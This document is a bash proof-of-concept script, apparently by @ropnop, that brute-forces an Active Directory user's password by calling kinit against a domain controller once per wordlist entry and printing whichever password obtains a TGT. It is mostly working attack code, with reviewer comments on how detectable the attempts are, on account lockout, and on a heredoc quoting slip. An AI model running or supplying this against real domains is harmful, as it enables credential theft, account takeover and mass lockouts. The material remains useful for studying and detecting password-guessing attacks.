A quick tool to bruteforce an AD user's password by requesting TGTs from the Domain Controller with 'kinit'
#!/bin/bash
# Title: kinit_brute.sh
# Author: @ropnop
# Description: This is a PoC for bruteforcing passwords using 'kinit' to try to check out a TGT from a Domain Controller
# The script configures the realm and KDC for you based on the domain provided and the domain controller
# Since this configuration is only temporary though, if you want to actually *use* the TGT you should actually edit /etc/krb5.conf
# Only tested with Heimdal kerberos (error messages might be different for MIT clients)
# Note: this *will* lock out accounts if a domain lockout policy is set. Be careful
#
# Usage: ./kinit_brute.sh full_username domainController wordlist_file
#   $1 - user principal in user@domain form; the realm is derived from the text after '@'
#   $2 - host used as the KDC (and admin_server) in the generated config
#   $3 - wordlist, one candidate password per line
# Exit status: 1 on a usage error, on any fatal kinit error, and when a password is
#   accepted; the script falls off the end of the loop (status 0) when the wordlist
#   is exhausted without a hit.
# NOTE(review): every iteration is a fresh kinit run, i.e. one AS-REQ to the KDC.
#   Expect each attempt to be visible on the DC as a Kerberos authentication event
#   (failed pre-authentication for wrong guesses) and to count toward any lockout
#   threshold; this is noisy by design and straightforward to alert on.
USERNAME=$1           # user principal, e.g. ropnop@contoso.com
DOMAINCONTROLLER=$2   # KDC hostname
WORDLIST=$3           # candidate passwords, read line by line below
# Exactly three positional arguments are required.
if [[ $# -ne 3 ]]; then
  echo "[!] Usage: ./kinit_brute.sh full_username domainController wordlist_file"
  echo "[!] Example: ./kinit_brute.sh ropnop@contoso.com dc01.contoso.com passwords.txt"
  exit 1
fi
# Realm = upper-cased part of USERNAME after '@' (empty if there is no '@').
DOMAIN=$(echo $USERNAME | awk -F@ '{print toupper($2)}')
echo "[+] User: $USERNAME"
echo "[+] Kerberos Realm: $DOMAIN"
echo "[+] KDC: $DOMAINCONTROLLER"
echo ""
# Throwaway krb5.conf in a mktemp file. There is no trap/rm, so it is left behind on exit.
# NOTE(review): the heredoc delimiter is quoted, so no parameter expansion happens and the
#   file is written with literal "$DOMAIN" / "$DOMAINCONTROLLER" text; KRB5_CONF is also a
#   plain shell variable here (not exported to child processes). Confirm against the
#   intended behaviour -- see the /etc/krb5.conf remark in the header.
KRB5_CONF=$(mktemp)
cat > $KRB5_CONF <<'asdfasdf'
[libdefaults]
default_realm = $DOMAIN
[realms]
$DOMAIN = {
kdc = $DOMAINCONTROLLER
admin_server = $DOMAINCONTROLLER
}
asdfasdf
# One kinit attempt per wordlist line. Plain 'read' (no -r, default IFS): backslashes in
# a line are interpreted and leading/trailing whitespace is trimmed before use.
while read PASSWORD; do
  # stderr is merged into stdout; an empty RESULT is treated as success further down.
  RESULT=$(
  echo $PASSWORD | kinit --password-file=STDIN $USERNAME 2>&1
  )
  # The following substring checks are Heimdal error messages (see header note on MIT).
  # Fatal conditions: stop immediately rather than burning more attempts.
  if [[ $RESULT == *"unable to reach"* ]]; then
    echo "[!] Unable to find KDC for realm. Check domain and DC"
    exit 1
  fi
  if [[ $RESULT == *"Wrong realm"* ]]; then
    echo "[!] Wrong realm. Make sure domain and DC are correct"
    exit 1
  fi
  # Lockout reached: continuing would only add noise against an already-locked account.
  if [[ $RESULT == *"Clients credentials have been revoked"* ]]; then
    echo "[!] Account locked out!"
    exit 1
  fi
  if [[ $RESULT == *"Password incorrect"* ]]; then
    :   # expected case for a wrong guess: silently move to the next line
  elif [[ -z "$RESULT" ]]; then
    # kinit printed nothing, which is taken to mean the TGT was issued.
    echo "[+] Found password: $PASSWORD"
    echo ""
    exit 1
  else
    # Any other message is reported but does not stop the loop.
    echo "[+] Error: $RESULT"
  fi
done <$WORDLIST